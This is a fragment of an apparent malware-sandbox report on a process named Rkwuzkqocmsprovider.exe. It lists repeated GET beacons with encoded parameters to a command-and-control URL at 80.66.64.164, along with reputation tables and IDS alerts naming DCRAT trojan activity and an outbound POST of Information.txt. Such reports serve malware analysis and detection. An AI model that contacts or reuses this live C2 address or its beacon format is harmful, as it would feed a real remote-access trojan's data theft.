http://80.66.64.164/javascriptTemporary.php?ykkGBQVG=7rrkFmKp4&V3jBXsOjtCFOTxxDhnL=anqGjFZM&3913157c093dad486140eb17bb933205=QZ1Y2N5QGO1IGO2MmN3IGM2UWN0M2N0YzNmBDMzUTOmRTNhVmY3UDZ3cTNxEjM5YzNyATMwIDN&81b4323d1ba298bdd827e6bc71221f6c=gYkFTZ0MDN3QmYkNjMjV2NzATNlJGO2MjM4EzN0MGO3EmZwcjMygTM&dd7b03ae6c4e45bd2937ccddc7db3520=0VfiIiOiIjYkBjNzkTY5EjZwI2N0QjNlVDO4UDNhZmY0gjMklTZiwiIhdTY1ATOwETYhF2N1YmY5cTMxITN3ITNzUjZhRWOlN2MxETNmRjY2IiOicDOiFTNwI2NiVjM0YWNkZjZldjZiJjMwADM3ATN0UTMiwiIxMjY0YWOllDZ5EWMhNTOyQ2NiVGNyEDZyQWZyATOxADNyUGN4EjY0IiOiMjN2UjNmNjZhRTYhFGM3UWOmJTYyYGMiR2MyQmNwYGZis3W | TR | text | 104 b | malicious |
1224 | Rkwuzkqocmsprovider.exe | GET | 200 | 80.66.64.164:80 | http://80.66.64.164/javascriptTemporary.php?ykkGBQVG=7rrkFmKp4&V3jBXsOjtCFOTxxDhnL=anqGjFZM&3913157c093dad486140eb17bb933205=QZ1Y2N5QGO1IGO2MmN3IGM2UWN0M2N0YzNmBDMzUTOmRTNhVmY3UDZ3cTNxEjM5YzNyATMwIDN&81b4323d1ba298bdd827e6bc71221f6c=gYkFTZ0MDN3QmYkNjMjV2NzATNlJGO2MjM4EzN0MGO3EmZwcjMygTM&388bb5cba49bcf24876d6c7eea81bda3=d1nILBTQNJiOiIjYkBjNzkTY5EjZwI2N0QjNlVDO4UDNhZmY0gjMklTZiwiIxYTNiNmYkVTOwcjNxMTZjZjZilTYjBTMkFDZmRWNkFmZjBTM0MTN2IiOicDOiFTNwI2NiVjM0YWNkZjZldjZiJjMwADM3ATN0UTMiwiIxMjY0YWOllDZ5EWMhNTOyQ2NiVGNyEDZyQWZyATOxADNyUGN4EjY0IiOiMjN2UjNmNjZhRTYhFGM3UWOmJTYyYGMiR2MyQmNwYGZis3W | TR | text | 104 b | malicious |
1224 | Rkwuzkqocmsprovider.exe | GET | 200 | 80.66.64.164:80 | http://80.66.64.164/javascriptTemporary.php?ykkGBQVG=7rrkFmKp4&V3jBXsOjtCFOTxxDhnL=anqGjFZM&3913157c093dad486140eb17bb933205=QZ1Y2N5QGO1IGO2MmN3IGM2UWN0M2N0YzNmBDMzUTOmRTNhVmY3UDZ3cTNxEjM5YzNyATMwIDN&81b4323d1ba298bdd827e6bc71221f6c=gYkFTZ0MDN3QmYkNjMjV2NzATNlJGO2MjM4EzN0MGO3EmZwcjMygTM&dd7b03ae6c4e45bd2937ccddc7db3520=0VfiIiOiIjYkBjNzkTY5EjZwI2N0QjNlVDO4UDNhZmY0gjMklTZiwiIxYTNiNmYkVTOwcjNxMTZjZjZilTYjBTMkFDZmRWNkFmZjBTM0MTN2IiOicDOiFTNwI2NiVjM0YWNkZjZldjZiJjMwADM3ATN0UTMiwiIxMjY0YWOllDZ5EWMhNTOyQ2NiVGNyEDZyQWZyATOxADNyUGN4EjY0IiOiMjN2UjNmNjZhRTYhFGM3UWOmJTYyYGMiR2MyQmNwYGZis3W | TR | text | 104 b | malicious |
1224 | Rkwuzkqocmsprovider.exe | GET | 200 | 80.66.64.164:80 | http://80.66.64.164/javascriptTemporary.php?ykkGBQVG=7rrkFmKp4&V3jBXsOjtCFOTxxDhnL=anqGjFZM&3913157c093dad486140eb17bb933205=QZ1Y2N5QGO1IGO2MmN3IGM2UWN0M2N0YzNmBDMzUTOmRTNhVmY3UDZ3cTNxEjM5YzNyATMwIDN&81b4323d1ba298bdd827e6bc71221f6c=gYkFTZ0MDN3QmYkNjMjV2NzATNlJGO2MjM4EzN0MGO3EmZwcjMygTM&ba1f2800a8106931905496eca7a12557=d1nIxYTNiNmYkVTOwcjNxMTZjZjZilTYjBTMkFDZmRWNkFmZjBTM0MTN2IiOicDOiFTNwI2NiVjM0YWNkZjZldjZiJjMwADM3ATN0UTMiwiIxMjY0YWOllDZ5EWMhNTOyQ2NiVGNyEDZyQWZyATOxADNyUGN4EjY0IiOiMjN2UjNmNjZhRTYhFGM3UWOmJTYyYGMiR2MyQmNwYGZis3W | TR | text | 104 b | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
1224 | Rkwuzkqocmsprovider.exe | 80.66.64.164:80 | — | LLC South Internet | TR | malicious |
— | — | 80.66.64.164:80 | — | LLC South Internet | TR | malicious |
PID | Process | Class | Message |
---|---|---|---|
1224 | Rkwuzkqocmsprovider.exe | A Network Trojan was detected | ET MALWARE DCRAT Activity (GET) |
1224 | Rkwuzkqocmsprovider.exe | A Network Trojan was detected | ET HUNTING Observed Malicious Filename in Outbound POST Request (Information.txt) |